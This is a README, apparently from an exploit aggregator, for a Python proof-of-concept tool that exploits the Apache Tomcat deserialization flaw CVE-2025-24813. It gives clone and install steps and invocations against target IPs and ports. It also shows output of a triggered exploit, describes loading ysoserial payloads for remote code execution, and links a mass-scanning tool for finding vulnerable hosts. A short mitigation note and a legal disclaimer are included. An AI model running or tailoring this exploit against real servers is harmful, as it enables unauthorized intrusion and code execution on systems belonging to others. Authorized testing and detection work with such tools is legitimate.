Exploit for Use of Incorrectly-Resolved Name or Reference in Apache Tomcat CVE-2025-24813

## https://sploitus.com/exploit?id=7F6E5CBF-1772-5755-A56A-7CDF0FC84BA9
# Apache Tomcat CVE-2025-24813 Proof of Concept (PoC)

![License](https://img.shields.io/badge/License-MIT-green.svg)
![Python](https://img.shields.io/badge/Python-3.x-blue.svg)

A proof-of-concept exploit for the Apache Tomcat deserialization vulnerability (CVE-2025-24813). This tool demonstrates how attackers could exploit insecure deserialization in Tomcat's session management.

**WARNING**: This tool is for authorized security testing and educational purposes only. Unauthorized use against systems you don't own is illegal.

## Features

- Supports both default (safe) and custom payloads
- SSL/TLS support (with optional verification bypass)
- Color-coded output for better visibility
- Interactive payload selection
- Configurable timeouts

## Requirements

- Python 3.x
- Required packages (automatically installed via requirements.txt):
  - `requests`
  - `colorama`

## Installation

```bash
git clone https://github.com/mattb709/CVE-2025-24813-PoC.git
cd CVE-2025-24813-PoC
pip install -r requirements.txt
```

## Usage

Basic usage:
```bash
python CVE-2025-24813-PoC.py -t 192.168.1.100 -p 8080
```

Advanced options:
```bash
python CVE-2025-24813-PoC.py \
  -t 10.0.0.1 \
  -p 8443 \
  --protocol https \
  --no-verify \
  --timeout 15
```

### Command Line Arguments
| Argument | Description | Required |
|----------|-------------|----------|
| `-t`, `--target` | Target IP address | Yes |
| `-p`, `--port` | Target port number | Yes |
| `--protocol` | `http` or `https` (default: http) | No |
| `--no-verify` | Disable SSL certificate verification | No |
| `--timeout` | Request timeout in seconds (default: 10) | No |

## Payload Options
1. **Default Payload**: Harmless serialized object (safe for detection)
2. **Custom Payload**: Hex-encoded payload from tools like ysoserial

## Example Output

```plaintext
[*] Apache Tomcat CVE-2025-24813 Exploit PoC 
[!] WARNING: For authorized testing only. Unauthorized use is illegal.

[*] Targeting http://192.168.1.100:8080

[*] Payload Options:
1. Use default dummy payload (safe, for detection)
2. Enter custom payload (hex-encoded, e.g., from ysoserial)
[?] Enter choice (1 or 2): 1
[*] Using default dummy payload.

[*] Attempting exploit...
[+] Success: Deserialization triggered (HTTP 500). Potential RCE if payload is malicious!
```
## Related Tools
For mass scanning vulnerable systems:  
🔍 [CVE-2025-24813-Scanner](https://github.com/Mattb709/CVE-2025-24813-Scanner) - Bulk detection tool for vulnerable Tomcat hosts

## Mitigation
If you're affected by this vulnerability:
1. Upgrade to the latest patched version of Apache Tomcat
2. Consider using a serialization filter

## Legal Disclaimer
This software is provided under the MIT License. The author is not responsible for any misuse of this tool. Always obtain proper authorization before testing systems.

## License
MIT License - See [LICENSE](LICENSE) file for details.